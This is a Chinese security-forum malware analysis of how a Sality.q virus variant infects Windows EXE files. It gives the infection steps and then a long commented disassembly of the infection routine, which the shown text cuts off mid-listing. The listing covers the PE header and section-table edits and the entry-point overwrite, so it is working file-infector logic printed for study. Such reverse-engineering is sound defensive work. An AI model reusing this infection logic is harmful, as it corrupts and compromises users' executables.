-
-
[旧帖] [原创][病毒分析] Sality.q病毒变种之EXE感染方式分析 0.00雪花
-
发表于: 2008-4-11 16:13 4278
-
/* Sality.q病毒变种之EXE感染方式分析
* 文件名:vcmgcd32.dll
* MD5:ae22ca9f11ade8e362254b452cc07f78
* 壳:未加
* By Vincent.peng on 2008.04.08
*/
调试方法:
在Fun为10003FF0的CreateThread断下,然后转EIP到10003FF0处。
一、感染过程分析:
1 保存文件属性、时间。
2 设置文件属性为文档。
3 得到文件大小:
感染1000B ~ 1400000B之间的exe文件。
4 计算出OEP的文件偏移地址。
5 修改PE头、节表:
1) 修改NtHeaders->OptionalHeader.SizeOfImage、NtHeaders->FileHeader.NumberOfSections。
2) 新增一节表头:节名为文件名(去扩展名)的最后一字符与code, 或date, 或rdate, 或text, 或UPX等字符串的组合。
6 申请一段内存空间保存原始OEP(7B字节)和新增加节的数据内容,并用随机因子加密。
7 用自解密算法(7B字节)替换原OEP开始的7B个字节。
8 将新节追加到文件尾部。
9 还原文件属性、时间。
此变种有个BUG,就是被感染的程序无法运行。因为被感染文件运行、自解密后,没有还原原始OEP及JMP的代码。
二、感染代码:
10002020 $ 55 PUSH EBP
10002021 . 8BEC MOV EBP,ESP
10002023 . 6A FF PUSH -1
10002025 . 68 58110010 PUSH vcmgcd32.10001158
1000202A . 68 48460010 PUSH vcmgcd32.10004648 ; SE 处理程序安装
1000202F . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
10002035 . 50 PUSH EAX
10002036 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP
1000203D . 81C4 08FFFFFF ADD ESP,-0F8
10002043 . 53 PUSH EBX
10002044 . 56 PUSH ESI
10002045 . 57 PUSH EDI
10002046 . 8965 E8 MOV DWORD PTR SS:[EBP-18],ESP
10002049 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
10002053 . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
1000205A . C785 10FFFFFF>MOV DWORD PTR SS:[EBP-F0],0
10002064 . C785 24FFFFFF>MOV DWORD PTR SS:[EBP-DC],0
1000206E . C785 18FFFFFF>MOV DWORD PTR SS:[EBP-E8],0
10002078 . C745 AC 00000>MOV DWORD PTR SS:[EBP-54],0
1000207F . C785 2CFFFFFF>MOV DWORD PTR SS:[EBP-D4],0
10002089 . C785 08FFFFFF>MOV DWORD PTR SS:[EBP-F8],0
10002093 . C745 E4 00000>MOV DWORD PTR SS:[EBP-1C],0
1000209A . C745 E0 00000>MOV DWORD PTR SS:[EBP-20],0
100020A1 . C745 CC 00500>MOV DWORD PTR SS:[EBP-34],5000
100020A8 . 66:C745 B4 00>MOV WORD PTR SS:[EBP-4C],0
100020AE . B9 1F000000 MOV ECX,1F
100020B3 . BE 286A0010 MOV ESI,vcmgcd32.10006A28
100020B8 . 8DBD 30FFFFFF LEA EDI,DWORD PTR SS:[EBP-D0]
100020BE . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
100020C0 . C645 DC 00 MOV BYTE PTR SS:[EBP-24],0
100020C4 . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
100020CB . 833D 048B0010>CMP DWORD PTR DS:[10008B04],0
100020D2 . 74 47 JE SHORT vcmgcd32.1000211B
100020D4 . 68 04010000 PUSH 104 ; /WideBufSize = 104 (260.)
100020D9 . 68 70E20010 PUSH vcmgcd32.1000E270 ; |WideCharBuf = vcmgcd32.1000E270
100020DE . 6A FF PUSH -1 ; |StringSize = FFFFFFFF (-1.)
100020E0 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
100020E3 . 50 PUSH EAX ; |StringToMap
100020E4 . 6A 00 PUSH 0 ; |Options = 0
100020E6 . 6A 00 PUSH 0 ; |CodePage = CP_ACP
100020E8 . FF15 98100010 CALL DWORD PTR DS:[<&KERNEL32.MultiByteToWideChar>] ; \MultiByteToWideChar
100020EE . 68 70E20010 PUSH vcmgcd32.1000E270
100020F3 . 6A 00 PUSH 0
100020F5 . FF15 048B0010 CALL DWORD PTR DS:[10008B04] ; sfc_os.SfcIsFileProtected
100020FB . 85C0 TEST EAX,EAX
100020FD . 74 1C JE SHORT vcmgcd32.1000211B
100020FF . C785 00FFFFFF>MOV DWORD PTR SS:[EBP-100],0
10002109 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002110 . 8B85 00FFFFFF MOV EAX,DWORD PTR SS:[EBP-100]
10002116 . E9 3D0A0000 JMP vcmgcd32.10002B58
1000211B > 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
1000211E . 51 PUSH ECX ; /FileName
1000211F . FF15 3C100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileAttributesA>] ; \GetFileAttributesA
10002125 . 8945 D8 MOV DWORD PTR SS:[EBP-28],EAX
10002128 . 6A 20 PUSH 20 ; /FileAttributes = ARCHIVE
1000212A . 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ; |
1000212D . 52 PUSH EDX ; |FileName
1000212E . FF15 94100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileAttributesA>] ; \SetFileAttributesA
10002134 . 85C0 TEST EAX,EAX
10002136 . 75 1C JNZ SHORT vcmgcd32.10002154
10002138 . C785 FCFEFFFF>MOV DWORD PTR SS:[EBP-104],0
10002142 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002149 . 8B85 FCFEFFFF MOV EAX,DWORD PTR SS:[EBP-104]
1000214F . E9 040A0000 JMP vcmgcd32.10002B58
10002154 > 6A 00 PUSH 0 ; /hTemplateFile = NULL
10002156 . 68 80000000 PUSH 80 ; |Attributes = NORMAL
1000215B . 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING
1000215D . 6A 00 PUSH 0 ; |pSecurity = NULL
1000215F . 6A 00 PUSH 0 ; |ShareMode = 0
10002161 . 68 000000C0 PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
10002166 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
10002169 . 50 PUSH EAX ; |FileName
1000216A . FF15 6C100010 CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; \CreateFileA
10002170 . 8985 04FFFFFF MOV DWORD PTR SS:[EBP-FC],EAX
10002176 . 6A 00 PUSH 0 ; /pFileSizeHigh = NULL
10002178 . 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC] ; |
1000217E . 51 PUSH ECX ; |hFile
1000217F . FF15 68100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileSize>] ; \GetFileSize
10002185 . 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX
10002188 . 83BD 04FFFFFF>CMP DWORD PTR SS:[EBP-FC],-1
1000218F . 0F84 87090000 JE vcmgcd32.10002B1C
10002195 . 817D B8 00004>CMP DWORD PTR SS:[EBP-48],1400000
1000219C . 0F83 7A090000 JNB vcmgcd32.10002B1C
100021A2 . 817D B8 00100>CMP DWORD PTR SS:[EBP-48],1000
100021A9 . 0F86 6D090000 JBE vcmgcd32.10002B1C
100021AF . 8B55 B8 MOV EDX,DWORD PTR SS:[EBP-48]
100021B2 . 8955 B0 MOV DWORD PTR SS:[EBP-50],EDX
100021B5 . 8D85 1CFFFFFF LEA EAX,DWORD PTR SS:[EBP-E4]
100021BB . 50 PUSH EAX ; /pLastWrite
100021BC . 8D4D BC LEA ECX,DWORD PTR SS:[EBP-44] ; |
100021BF . 51 PUSH ECX ; |pLastAccess
100021C0 . 8D55 D0 LEA EDX,DWORD PTR SS:[EBP-30] ; |
100021C3 . 52 PUSH EDX ; |pCreationTime
100021C4 . 8B85 04FFFFFF MOV EAX,DWORD PTR SS:[EBP-FC] ; |
100021CA . 50 PUSH EAX ; |hFile
100021CB . FF15 90100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileTime>] ; \GetFileTime
100021D1 . 6A 00 PUSH 0 ; /MapName = NULL
100021D3 . 8B4D B8 MOV ECX,DWORD PTR SS:[EBP-48] ; |
100021D6 . 81C1 00500000 ADD ECX,5000 ; |
100021DC . 51 PUSH ECX ; |MaximumSizeLow
100021DD . 6A 00 PUSH 0 ; |MaximumSizeHigh = 0
100021DF . 6A 04 PUSH 4 ; |Protection = PAGE_READWRITE
100021E1 . 6A 00 PUSH 0 ; |pSecurity = NULL
100021E3 . 8B95 04FFFFFF MOV EDX,DWORD PTR SS:[EBP-FC] ; |
100021E9 . 52 PUSH EDX ; |hFile
100021EA . FF15 8C100010 CALL DWORD PTR DS:[<&KERNEL32.CreateFileMappingA>] ; \CreateFileMappingA
100021F0 . A3 10E20010 MOV DWORD PTR DS:[1000E210],EAX
100021F5 . 833D 10E20010>CMP DWORD PTR DS:[1000E210],0
100021FC . 0F84 C2080000 JE vcmgcd32.10002AC4
10002202 . 6A 00 PUSH 0 ; /MapSize = 0
10002204 . 6A 00 PUSH 0 ; |OffsetLow = 0
10002206 . 6A 00 PUSH 0 ; |OffsetHigh = 0
10002208 . 6A 02 PUSH 2 ; |AccessMode = FILE_MAP_WRITE
1000220A . A1 10E20010 MOV EAX,DWORD PTR DS:[1000E210] ; |
1000220F . 50 PUSH EAX ; |hMapObject => NULL
10002210 . FF15 7C100010 CALL DWORD PTR DS:[<&KERNEL32.MapViewOfFile>] ; \MapViewOfFile
10002216 . A3 94E60010 MOV DWORD PTR DS:[1000E694],EAX
1000221B . 833D 94E60010>CMP DWORD PTR DS:[1000E694],0 ; if a empty file
10002222 . 0F84 9C080000 JE vcmgcd32.10002AC4
10002228 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
1000222E . 8B51 3C MOV EDX,DWORD PTR DS:[ECX+3C] ; point to pe offset
10002231 . 8995 0CFFFFFF MOV DWORD PTR SS:[EBP-F4],EDX
10002237 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
1000223D . 3B45 B8 CMP EAX,DWORD PTR SS:[EBP-48]
10002240 . 0F83 7E080000 JNB vcmgcd32.10002AC4
10002246 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
1000224C . 0FBE51 18 MOVSX EDX,BYTE PTR DS:[ECX+18] ; infected flag??
10002250 . 83FA 40 CMP EDX,40
10002253 . 0F8C 6B080000 JL vcmgcd32.10002AC4
10002259 . 68 D8000000 PUSH 0D8
1000225E . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
10002263 . 0385 0CFFFFFF ADD EAX,DWORD PTR SS:[EBP-F4]
10002269 . 50 PUSH EAX
1000226A . 68 10900010 PUSH vcmgcd32.10009010
1000226F . E8 2C250000 CALL vcmgcd32.100047A0
10002274 . 83C4 0C ADD ESP,0C
10002277 . 813D 10900010>CMP DWORD PTR DS:[10009010],4550
10002281 . 0F85 3D080000 JNZ vcmgcd32.10002AC4
10002287 . 33C9 XOR ECX,ECX
10002289 . 66:8B0D 28900>MOV CX,WORD PTR DS:[10009028] ; GetMagicNumber
10002290 . 81F9 0B010000 CMP ECX,10B
10002296 . 0F85 28080000 JNZ vcmgcd32.10002AC4
1000229C . 833D 38900010>CMP DWORD PTR DS:[10009038],0 ; GetOEP
100022A3 . 0F84 1B080000 JE vcmgcd32.10002AC4
100022A9 . 8B15 48900010 MOV EDX,DWORD PTR DS:[10009048] ; ?? GetSectionAlignment or OEP file offset
100022AF . 52 PUSH EDX ; /Arg2 => 00000000
100022B0 . 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; |
100022B3 . 50 PUSH EAX ; |Arg1
100022B4 . E8 B7FAFFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
100022B9 . 83C4 08 ADD ESP,8
100022BC . 8945 CC MOV DWORD PTR SS:[EBP-34],EAX
100022BF . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
100022C9 . EB 0F JMP SHORT vcmgcd32.100022DA
100022CB > 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
100022D1 . 83C1 01 ADD ECX,1
100022D4 . 898D 14FFFFFF MOV DWORD PTR SS:[EBP-EC],ECX
100022DA > 33D2 XOR EDX,EDX
100022DC . 66:8B15 16900>MOV DX,WORD PTR DS:[10009016] ; GetNumberOfSections
100022E3 . 83EA 01 SUB EDX,1 ; sectionNum - 1
100022E6 . 3995 14FFFFFF CMP DWORD PTR SS:[EBP-EC],EDX
100022EC . 0F87 03010000 JA vcmgcd32.100023F5 ; > sectionNo then jmp
100022F2 . 6A 28 PUSH 28
100022F4 . 33C0 XOR EAX,EAX
100022F6 . 66:A1 2490001>MOV AX,WORD PTR DS:[10009024] ; sizeofOptionHeader
100022FC . 8B8D 0CFFFFFF MOV ECX,DWORD PTR SS:[EBP-F4]
10002302 . 03C8 ADD ECX,EAX
10002304 . 8B95 14FFFFFF MOV EDX,DWORD PTR SS:[EBP-EC]
1000230A . 6BD2 28 IMUL EDX,EDX,28
1000230D . 0315 94E60010 ADD EDX,DWORD PTR DS:[1000E694]
10002313 . 8D440A 18 LEA EAX,DWORD PTR DS:[EDX+ECX+18] ; GetSectionNameOffset
10002317 . 50 PUSH EAX
10002318 . 68 30E20010 PUSH vcmgcd32.1000E230
1000231D . E8 7E240000 CALL vcmgcd32.100047A0
10002322 . 83C4 0C ADD ESP,0C
10002325 . 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],1
1000232C . 75 10 JNZ SHORT vcmgcd32.1000233E
1000232E . 68 30E20010 PUSH vcmgcd32.1000E230 ; /String2 = ""
10002333 . 68 70E20010 PUSH vcmgcd32.1000E270 ; |String1 = vcmgcd32.1000E270
10002338 . FF15 80100010 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
1000233E > 8B0D 38900010 MOV ECX,DWORD PTR DS:[10009038]
10002344 . 3B0D 3CE20010 CMP ECX,DWORD PTR DS:[1000E23C]
1000234A . 72 5E JB SHORT vcmgcd32.100023AA
1000234C . 8B15 3CE20010 MOV EDX,DWORD PTR DS:[1000E23C] ; v.Offset
10002352 . 0315 38E20010 ADD EDX,DWORD PTR DS:[1000E238] ; v.Size
10002358 . 3915 38900010 CMP DWORD PTR DS:[10009038],EDX
1000235E . 73 4A JNB SHORT vcmgcd32.100023AA
10002360 . 833D 40E20010>CMP DWORD PTR DS:[1000E240],0
10002367 . 74 41 JE SHORT vcmgcd32.100023AA
10002369 . 833D 38E20010>CMP DWORD PTR DS:[1000E238],0
10002370 . 74 38 JE SHORT vcmgcd32.100023AA
10002372 . A1 3CE20010 MOV EAX,DWORD PTR DS:[1000E23C]
10002377 . 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX
1000237D . 8B0D 44E20010 MOV ECX,DWORD PTR DS:[1000E244]
10002383 . 898D 18FFFFFF MOV DWORD PTR SS:[EBP-E8],ECX
10002389 . 8B15 38900010 MOV EDX,DWORD PTR DS:[10009038]
1000238F . 2B15 3CE20010 SUB EDX,DWORD PTR DS:[1000E23C]
10002395 . 0315 44E20010 ADD EDX,DWORD PTR DS:[1000E244]
1000239B . 8955 AC MOV DWORD PTR SS:[EBP-54],EDX
1000239E . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023A4 . 8985 28FFFFFF MOV DWORD PTR SS:[EBP-D8],EAX
100023AA > 8B8D 08FFFFFF MOV ECX,DWORD PTR SS:[EBP-F8]
100023B0 . 3B0D 3CE20010 CMP ECX,DWORD PTR DS:[1000E23C]
100023B6 . 73 15 JNB SHORT vcmgcd32.100023CD
100023B8 . 8B15 3CE20010 MOV EDX,DWORD PTR DS:[1000E23C]
100023BE . 8995 08FFFFFF MOV DWORD PTR SS:[EBP-F8],EDX
100023C4 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023CA . 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
100023CD > 8B8D 2CFFFFFF MOV ECX,DWORD PTR SS:[EBP-D4]
100023D3 . 3B0D 44E20010 CMP ECX,DWORD PTR DS:[1000E244]
100023D9 . 73 15 JNB SHORT vcmgcd32.100023F0
100023DB . 8B15 44E20010 MOV EDX,DWORD PTR DS:[1000E244]
100023E1 . 8995 2CFFFFFF MOV DWORD PTR SS:[EBP-D4],EDX
100023E7 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023ED . 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX
100023F0 >^ E9 D6FEFFFF JMP vcmgcd32.100022CB ; find OEP's section, Get number of section
100023F5 > 6A 28 PUSH 28
100023F7 . 33C9 XOR ECX,ECX
100023F9 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024] ; SizeOfOptionHeader
10002400 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002406 . 03D1 ADD EDX,ECX
10002408 . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
1000240B . 6BC0 28 IMUL EAX,EAX,28
1000240E . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002414 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
10002418 . 51 PUSH ECX
10002419 . 68 30E20010 PUSH vcmgcd32.1000E230
1000241E . E8 7D230000 CALL vcmgcd32.100047A0
10002423 . 83C4 0C ADD ESP,0C
10002426 . 8B15 4C900010 MOV EDX,DWORD PTR DS:[1000904C]
1000242C . 52 PUSH EDX ; /Arg2 => 00000000
1000242D . A1 44E20010 MOV EAX,DWORD PTR DS:[1000E244] ; |
10002432 . 0305 40E20010 ADD EAX,DWORD PTR DS:[1000E240] ; |
10002438 . 50 PUSH EAX ; |Arg1
10002439 . E8 32F9FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000243E . 83C4 08 ADD ESP,8
10002441 . 8945 C8 MOV DWORD PTR SS:[EBP-38],EAX
10002444 . C705 68900010>MOV DWORD PTR DS:[10009068],0
1000244E . 8B0D 48900010 MOV ECX,DWORD PTR DS:[10009048]
10002454 . 51 PUSH ECX ; /Arg2 => 00000000
10002455 . 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34] ; |
10002458 . 0315 60900010 ADD EDX,DWORD PTR DS:[10009060] ; |
1000245E . 52 PUSH EDX ; |Arg1
1000245F . E8 0CF9FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
10002464 . 83C4 08 ADD ESP,8
10002467 . A3 60900010 MOV DWORD PTR DS:[10009060],EAX
1000246C . A1 38900010 MOV EAX,DWORD PTR DS:[10009038]
10002471 . 2B85 24FFFFFF SUB EAX,DWORD PTR SS:[EBP-DC]
10002477 . 0385 18FFFFFF ADD EAX,DWORD PTR SS:[EBP-E8]
1000247D . 8985 18FFFFFF MOV DWORD PTR SS:[EBP-E8],EAX
10002483 . 68 30E20010 PUSH vcmgcd32.1000E230 ; /String2 = ""
10002488 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |String1 = vcmgcd32.100090E8
1000248D . FF15 80100010 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
10002493 . 68 E8900010 PUSH vcmgcd32.100090E8 ; /StringOrChar = ""
10002498 . FF15 20110010 CALL DWORD PTR DS:[<&USER32.CharUpperA>] ; \CharUpperA
1000249E . 833D 4CE20010>CMP DWORD PTR DS:[1000E24C],0
100024A5 . 0F85 19060000 JNZ vcmgcd32.10002AC4
100024AB . 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]
100024AE . 030D 48900010 ADD ECX,DWORD PTR DS:[10009048]
100024B4 . 3B4D B8 CMP ECX,DWORD PTR SS:[EBP-48]
100024B7 . 0F86 07060000 JBE vcmgcd32.10002AC4
100024BD . 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
100024C0 . 3B55 E0 CMP EDX,DWORD PTR SS:[EBP-20]
100024C3 . 0F85 FB050000 JNZ vcmgcd32.10002AC4
100024C9 . 813D 54E20010>CMP DWORD PTR DS:[1000E254],E0000020
100024D3 . 73 4B JNB SHORT vcmgcd32.10002520
100024D5 . A1 30610010 MOV EAX,DWORD PTR DS:[10006130]
100024DA . 50 PUSH EAX ; /Arg2 => 10006438 ASCII "TEXT"
100024DB . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
100024E0 . E8 DBECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
100024E5 . 83C4 08 ADD ESP,8
100024E8 . 85C0 TEST EAX,EAX
100024EA . 75 34 JNZ SHORT vcmgcd32.10002520
100024EC . 8B0D 34610010 MOV ECX,DWORD PTR DS:[10006134] ; vcmgcd32.10006440
100024F2 . 51 PUSH ECX ; /Arg2 => 10006440 ASCII "UPX"
100024F3 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
100024F8 . E8 C3ECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
100024FD . 83C4 08 ADD ESP,8
10002500 . 85C0 TEST EAX,EAX
10002502 . 75 1C JNZ SHORT vcmgcd32.10002520
10002504 . 8B15 38610010 MOV EDX,DWORD PTR DS:[10006138] ; vcmgcd32.10006448
1000250A . 52 PUSH EDX ; /Arg2 => 10006448 ASCII "CODE"
1000250B . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
10002510 . E8 ABECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
10002515 . 83C4 08 ADD ESP,8
10002518 . 85C0 TEST EAX,EAX
1000251A . 0F84 EF000000 JE vcmgcd32.1000260F
10002520 > 833D 40E20010>CMP DWORD PTR DS:[1000E240],0
10002527 . 0F84 E2000000 JE vcmgcd32.1000260F
1000252D . 833D 38E20010>CMP DWORD PTR DS:[1000E238],0
10002534 . 0F84 D5000000 JE vcmgcd32.1000260F
1000253A . A1 40E20010 MOV EAX,DWORD PTR DS:[1000E240]
1000253F . 3B05 38E20010 CMP EAX,DWORD PTR DS:[1000E238]
10002545 . 72 17 JB SHORT vcmgcd32.1000255E
10002547 . 8B0D 40E20010 MOV ECX,DWORD PTR DS:[1000E240]
1000254D . 2B0D 38E20010 SUB ECX,DWORD PTR DS:[1000E238]
10002553 . 034D CC ADD ECX,DWORD PTR SS:[EBP-34]
10002556 . 898D F8FEFFFF MOV DWORD PTR SS:[EBP-108],ECX
1000255C . EB 09 JMP SHORT vcmgcd32.10002567
1000255E > 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34]
10002561 . 8995 F8FEFFFF MOV DWORD PTR SS:[EBP-108],EDX
10002567 > A1 38E20010 MOV EAX,DWORD PTR DS:[1000E238]
1000256C . 0385 F8FEFFFF ADD EAX,DWORD PTR SS:[EBP-108]
10002572 . A3 38E20010 MOV DWORD PTR DS:[1000E238],EAX
10002577 . 8B0D 4C900010 MOV ECX,DWORD PTR DS:[1000904C]
1000257D . 51 PUSH ECX ; /Arg2 => 00000000
1000257E . 8B15 40E20010 MOV EDX,DWORD PTR DS:[1000E240] ; |
10002584 . 0355 CC ADD EDX,DWORD PTR SS:[EBP-34] ; |
10002587 . 52 PUSH EDX ; |Arg1
10002588 . E8 E3F7FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000258D . 83C4 08 ADD ESP,8
10002590 . A3 40E20010 MOV DWORD PTR DS:[1000E240],EAX
10002595 . A1 48900010 MOV EAX,DWORD PTR DS:[10009048]
1000259A . 50 PUSH EAX ; /Arg2 => 00000000
1000259B . 8B0D 40E20010 MOV ECX,DWORD PTR DS:[1000E240] ; |
100025A1 . 51 PUSH ECX ; |Arg1 => 00000000
100025A2 . E8 C9F7FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
100025A7 . 83C4 08 ADD ESP,8
100025AA . A3 38E20010 MOV DWORD PTR DS:[1000E238],EAX
100025AF . C705 54E20010>MOV DWORD PTR DS:[1000E254],E0000020
100025B9 . C705 4CE20010>MOV DWORD PTR DS:[1000E24C],11
100025C3 . 6A 28 PUSH 28
100025C5 . 68 30E20010 PUSH vcmgcd32.1000E230
100025CA . 33D2 XOR EDX,EDX
100025CC . 66:8B15 24900>MOV DX,WORD PTR DS:[10009024]
100025D3 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
100025D9 . 03C2 ADD EAX,EDX
100025DB . 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C]
100025DE . 6BC9 28 IMUL ECX,ECX,28
100025E1 . 030D 94E60010 ADD ECX,DWORD PTR DS:[1000E694]
100025E7 . 8D5401 18 LEA EDX,DWORD PTR DS:[ECX+EAX+18]
100025EB . 52 PUSH EDX
100025EC . E8 AF210000 CALL vcmgcd32.100047A0
100025F1 . 83C4 0C ADD ESP,0C
100025F4 . A1 3CE20010 MOV EAX,DWORD PTR DS:[1000E23C]
100025F9 . 0305 40E20010 ADD EAX,DWORD PTR DS:[1000E240]
100025FF . 2B45 CC SUB EAX,DWORD PTR SS:[EBP-34]
10002602 . 2B05 38900010 SUB EAX,DWORD PTR DS:[10009038]
10002608 . 8945 C4 MOV DWORD PTR SS:[EBP-3C],EAX
1000260B . C645 DC 01 MOV BYTE PTR SS:[EBP-24],1
1000260F > 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]
10002612 . 81E1 FF000000 AND ECX,0FF
10002618 . 85C9 TEST ECX,ECX
1000261A . 0F85 45020000 JNZ vcmgcd32.10002865
10002620 . 66:8B15 16900>MOV DX,WORD PTR DS:[10009016] ; NumberOfSections
10002627 . 66:83C2 01 ADD DX,1 ; ++
1000262B . 66:8915 16900>MOV WORD PTR DS:[10009016],DX
10002632 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
1000263C . 833D E0900010>CMP DWORD PTR DS:[100090E0],0
10002643 . 74 4F JE SHORT vcmgcd32.10002694
10002645 . A1 E4900010 MOV EAX,DWORD PTR DS:[100090E4]
1000264A . 50 PUSH EAX
1000264B . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002651 . 030D E0900010 ADD ECX,DWORD PTR DS:[100090E0]
10002657 . 51 PUSH ECX
10002658 . 68 E8900010 PUSH vcmgcd32.100090E8
1000265D . E8 3E210000 CALL vcmgcd32.100047A0
10002662 . 83C4 0C ADD ESP,0C
10002665 . 8B15 E0900010 MOV EDX,DWORD PTR DS:[100090E0]
1000266B . 83C2 28 ADD EDX,28
1000266E . 8915 E0900010 MOV DWORD PTR DS:[100090E0],EDX
10002674 . A1 E4900010 MOV EAX,DWORD PTR DS:[100090E4]
10002679 . 50 PUSH EAX
1000267A . 68 E8900010 PUSH vcmgcd32.100090E8
1000267F . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
10002685 . 030D E0900010 ADD ECX,DWORD PTR DS:[100090E0]
1000268B . 51 PUSH ECX
1000268C . E8 0F210000 CALL vcmgcd32.100047A0
10002691 . 83C4 0C ADD ESP,0C
10002694 > 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
10002697 . 52 PUSH EDX ; /String
10002698 . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
1000269E . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
100026A1 . 8D5401 FB LEA EDX,DWORD PTR DS:[ECX+EAX-5]
100026A5 . 52 PUSH EDX ; /StringOrChar
100026A6 . FF15 18110010 CALL DWORD PTR DS:[<&USER32.CharLowerA>] ; \CharLowerA
100026AC . 0FBE05 70E200>MOVSX EAX,BYTE PTR DS:[1000E270]
100026B3 . 33C9 XOR ECX,ECX
100026B5 . 83F8 2E CMP EAX,2E
100026B8 . 0F94C1 SETE CL
100026BB . 81C1 70E20010 ADD ECX,vcmgcd32.1000E270
100026C1 . 51 PUSH ECX ; /<%s>
100026C2 . 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ; |
100026C5 . 52 PUSH EDX ; |/String
100026C6 . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; |\lstrlenA
100026CC . 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] ; |
100026CF . 0FBE5401 FB MOVSX EDX,BYTE PTR DS:[ECX+EAX-5] ; |
100026D4 . 52 PUSH EDX ; |<%c>
100026D5 . 68 A46A0010 PUSH vcmgcd32.10006AA4 ; |Format = ".%c%s"
100026DA . 68 30E20010 PUSH vcmgcd32.1000E230 ; |s = vcmgcd32.1000E230
100026DF . FF15 1C110010 CALL DWORD PTR DS:[<&USER32.wsprintfA>] ; \wsprintfA
100026E5 . 83C4 10 ADD ESP,10
100026E8 . 68 70E20010 PUSH vcmgcd32.1000E270 ; /String = ""
100026ED . FF15 FC100010 CALL DWORD PTR DS:[<&KERNEL32.lstrlenA>] ; \lstrlenA
100026F3 . 83F8 01 CMP EAX,1
100026F6 . 7E 30 JLE SHORT vcmgcd32.10002728
100026F8 . 0FBE05 72E200>MOVSX EAX,BYTE PTR DS:[1000E272]
100026FF . 83F8 60 CMP EAX,60
10002702 . 7E 19 JLE SHORT vcmgcd32.1000271D
10002704 . 0FBE0D 72E200>MOVSX ECX,BYTE PTR DS:[1000E272]
1000270B . 83F9 7B CMP ECX,7B
1000270E . 7D 0D JGE SHORT vcmgcd32.1000271D
10002710 . 68 30E20010 PUSH vcmgcd32.1000E230 ; /StringOrChar = ""
10002715 . FF15 18110010 CALL DWORD PTR DS:[<&USER32.CharLowerA>] ; \CharLowerA
1000271B . EB 0B JMP SHORT vcmgcd32.10002728
1000271D > 68 30E20010 PUSH vcmgcd32.1000E230 ; /StringOrChar = ""
10002722 . FF15 20110010 CALL DWORD PTR DS:[<&USER32.CharUpperA>] ; \CharUpperA
10002728 > 8B15 4C900010 MOV EDX,DWORD PTR DS:[1000904C]
1000272E . 52 PUSH EDX ; /Arg2 => 00000000
